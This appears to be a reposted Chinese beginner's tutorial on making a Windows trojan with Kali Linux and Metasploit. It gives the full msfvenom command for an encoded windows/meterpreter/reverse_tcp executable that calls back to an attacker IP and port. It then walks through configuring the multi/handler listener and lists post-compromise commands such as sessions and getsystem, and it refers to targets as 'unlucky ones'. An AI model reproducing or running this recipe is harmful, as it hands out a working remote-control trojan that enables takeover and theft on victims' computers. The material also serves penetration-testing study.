kali-使用Metaspoit制作木马
生活随笔
收集整理的這篇文章主要介紹了
kali-使用Metaspoit制作木马
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
-**
本人是個(gè)新手,寫寫筆記。 如果那里有錯(cuò)誤或者語言不妥的地方。
請(qǐng)給予斧正!萬分感謝!
**
寫在最前面
網(wǎng)絡(luò)中的日新月異,時(shí)常會(huì)有更新,下面是針對(duì)msf和kali的更新方式
msf中有許多可用的攻擊載荷,如果不及時(shí)更新會(huì)導(dǎo)致對(duì)新系統(tǒng)漏洞的不了解
首先要更新kali:
經(jīng)典三連
重啟一下就可以了 reboot 完成kali的整體更新
其次,單獨(dú)的對(duì)msf框架進(jìn)行更新
msfupdate以上就是kali的更新!
下面看完文章,會(huì)很好奇這個(gè)windows/meterpreter/reverse_tcp 這個(gè)是從哪里來的?
這個(gè)其實(shí)是msf框架中的針對(duì)windows的一個(gè)攻擊載荷
如何查看全部攻擊載荷或者篩選出我需要的載荷?
輸入 show all 命令就可以查看所有的配置選項(xiàng)
再往下就是攻擊載荷
可以使用 show payload 命令之查看現(xiàn)在可用的
你可以找到文章中的windows/meterpreter/reverse_tcp這個(gè)payload
這里面有 windows linux還有安卓的等等,根據(jù)需要來使用
在這片文章的后面,也就是先使用msfvemon制作出木馬,在進(jìn)入msfconsole的設(shè)置
如何判斷當(dāng)前的也就是我們選中的攻擊載荷是否對(duì)目標(biāo)操作系統(tǒng)具有有效的攻擊?
使用windows/meterpreter/reverse_tcp來舉例子
注意我紅框的位置,這里就是目標(biāo)操作系統(tǒng)的范圍
怎么查看?
使用 show targets命令查看對(duì)那些操作系統(tǒng)有用
這里只有ID 0一個(gè)選項(xiàng),要是有多個(gè)選項(xiàng)就是ID 0/ID 1 /ID 2這種格式
使用 set id 0/1/2 命令來選擇需要的操作系統(tǒng)
首先,我們要先知道木馬的使用過程,然后我們才能制作出木馬
- 木馬:控制端(我們)
- 被控制端(倒霉蛋們)
- 虛擬機(jī)的kali
- 打開終端
- 使用msfvenom -p命令來制作(因?yàn)槲矣玫氖莐ali2.0所以和1.0的版本不一樣)
- msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
- 看不明白?不要慌!
- windows/meterpreter/reverse_tcp ->大體看出來這是windows下的tcp的一個(gè)漏洞(強(qiáng)大的Metaspoit自帶多種漏洞,需要什么自行百度就ok)
- -e x86/shikata_ga_nai ->這是編碼方式(我的windows7是64位的,所以要選擇對(duì)應(yīng)的編碼格式。否則,生成可執(zhí)行文件再打開時(shí)就會(huì)出現(xiàn)錯(cuò)誤!)
- -i 5 ->編碼次數(shù)
- -b ->就是避免出現(xiàn)的值
- -f exe ->生成.exe的可執(zhí)行文件
- asd.exe > 文件名.exe
- LHOST ->這是填寫自己本機(jī)的IP(因?yàn)檫@種木馬是用反彈機(jī)制)
- LPORT ->填寫自己的端口
- 回車運(yùn)行!
- 我們可以看到,它生成一個(gè)434b的可執(zhí)行文件
- 問題來了!生成的文件在哪里?
- 使用ls命令查看,生成在當(dāng)前目錄下
- 然后,將生成文件復(fù)制到windows下
- 第二步
- 配置接收木馬上線的設(shè)置
- 打開Metaspoit
- 打開的命令為 msfconsole
- 我們就要開始輸入命令了
- msf > use exploit/multi/handler
- 我們使用handler模塊
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- 打開handler模塊后,設(shè)置我們制作時(shí)用的木馬漏洞
- 這里就顯示設(shè)置成功
- 我們現(xiàn)在就要設(shè)置接收的IP和端口
- 輸入命令
- msf exploit(handler) > show options
- 顯示,我們需要填寫什么設(shè)置
- 大家還記得我們制作木馬時(shí),填寫的ip和端口吧
- 一定要對(duì)應(yīng)
- msf exploit(handler) > set LHOST 192.168.1.108
- 使用set來依次設(shè)置
- msf exploit(handler) > set LPORT 5555
- 成功設(shè)置后
- 最后一步!
- 輸入
- msf exploit(handler) > exploit
- 運(yùn)行,等待木馬上線
- 我們?cè)趙indows下雙擊運(yùn)行
- 木馬上線成功!
- 接下來就可以進(jìn)行系統(tǒng)操作和文件操作
- background 后臺(tái)運(yùn)行
- sessions -i 查看后臺(tái)運(yùn)行會(huì)話
- sessions -i ID號(hào)
- getsystem
總結(jié)
以上是生活随笔為你收集整理的kali-使用Metaspoit制作木马的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 批量获取微信公众号文章里的图片
- 下一篇: 【开源的串口可视化工具——Serial